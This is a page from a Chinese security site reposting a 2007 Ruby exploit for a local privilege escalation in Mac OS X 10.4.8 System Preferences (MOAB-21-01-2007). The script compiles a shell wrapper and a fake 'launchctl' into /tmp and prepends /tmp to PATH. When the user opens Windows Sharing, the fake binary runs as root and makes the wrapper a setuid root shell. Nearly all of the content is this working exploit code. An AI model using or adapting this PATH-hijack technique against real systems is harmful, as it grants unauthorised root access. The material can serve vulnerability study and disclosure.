首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mac OS X 10.4.8 System Preferences Local Privilege Escalation Exploit
来源:kf_lists [at] digitalmunition.com 作者:Kevin 发布时间:2007-01-23  

#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-21-01-2007: OS X, making root shells easier each day.
#

SHELL_WRAP = 'int main() { system("/bin/sh -i"); return 0; }'
SHELL_PLANT = 'int main() { system("chown root: /tmp/shX; chmod 4755 /tmp/shX"); return 0; }'
PREFS_BINPATH = '/Applications/System\ Preferences.app/Contents/MacOS/System\ Preferences'

COMMAND_LINE = "echo '#{SHELL_WRAP}' > /tmp/t.c &&" +
"cc -o /tmp/shX /tmp/t.c &&" +
"echo '#{SHELL_PLANT}' > /tmp/t.c &&" +
"cc -o /tmp/launchctl /tmp/t.c &&" +
'export PATH="/tmp/:$PATH" &&' +
"#{PREFS_BINPATH} &"

def escalate()
system COMMAND_LINE
puts "++ Click on Sharing and then click on Windows Sharing..."
sleep 30 # make sure you have "time"
system "/tmp/shX"
end

escalate()



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·webSPELL 4.01.02 (gallery.php)
·VisoHotlink 1.01 functions.vis
·Mafia Scum Tools 2.0.0 (index.
·Microsoft Visual C++ (.RC Reso
·3Com TFTP Service <= 2.0.1
·Oracle 10g SYS.DBMS_CDC_IMPDP.
·Sun Microsystems Java GIF File
·Oracle 10g SYS.KUPW$WORKER.MAI
·Mac OS X 10.4.x Kernel shared_
·Oracle 10g SYS.KUPV$FT.ATTACH_
·Apple iChat 3.1.6 v441 aim://
·Vote-Pro 4.0 (poll_frame.php p
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved